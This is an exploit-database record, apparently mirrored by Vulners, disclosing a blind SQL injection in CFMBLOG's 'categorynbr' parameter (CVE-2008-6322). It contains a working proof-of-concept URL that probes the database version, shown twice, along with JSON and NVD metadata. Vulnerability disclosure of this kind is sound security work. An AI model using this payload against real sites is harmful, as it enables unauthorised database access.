Search...

CFMBLOG index.cfm categorynbr Blind SQL Injection Vulnerability

2008-12-10T00:00:00

ID EDB-ID:7415
Type exploitdb
Reporter AlpHaNiX
Modified 2008-12-10T00:00:00

Description

CFMBLOG (index.cfm categorynbr) Blind SQL Injection Vulnerability. CVE-2008-6322. Webapps exploit for asp platform

                                        
                                            ###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : CFMBLOG
#download : null
#Demo     : http://www.cfmblog.com


###########################################################################

#Exploits :

--=[BLIND SQL INJECTION]=--

http://www.cfmblog.com/index.cfm?categorynbr=2+and%20substring(@@version,1,1)=5


###########################################################################

# milw0rm.com [2008-12-10]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:7415", "hash": "f1dff6206a7d963dc40b02aedd8c628f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "CFMBLOG index.cfm categorynbr Blind SQL Injection Vulnerability", "description": "CFMBLOG (index.cfm categorynbr) Blind SQL Injection Vulnerability. CVE-2008-6322. Webapps exploit for asp platform", "published": "2008-12-10T00:00:00", "modified": "2008-12-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7415/", "reporter": "AlpHaNiX", "references": [], "cvelist": ["CVE-2008-6322"], "lastseen": "2016-02-01T02:10:16", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2016-02-01T02:10:16"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6322"]}], "modified": "2016-02-01T02:10:16"}, "vulnersScore": 6.9}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/7415/", "sourceData": "###########################################################################\n#-------------------------------AlpHaNiX----------------------------------#\n###########################################################################\n\n#Found By : AlpHaNiX\n#website : www.offensivetrack.org\n#contact : AlpHa[AT]HACKER[DOT]BZ\n\n###########################################################################\n\n#script : CFMBLOG\n#download : null\n#Demo : http://www.cfmblog.com\n\n\n###########################################################################\n\n#Exploits :\n\n--=[BLIND SQL INJECTION]=--\n\nhttp://www.cfmblog.com/index.cfm?categorynbr=2+and%20substring(@@version,1,1)=5\n\n\n###########################################################################\n\n# milw0rm.com [2008-12-10]\n", "osvdbidlist": ["50650"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:30", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in index.cfm in CFMSource CFMBlog allows remote attackers to execute arbitrary SQL commands via the categorynbr parameter.", "modified": "2017-09-29T01:33:00", "id": "CVE-2008-6322", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6322", "published": "2009-02-27T11:30:00", "title": "CVE-2008-6322", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}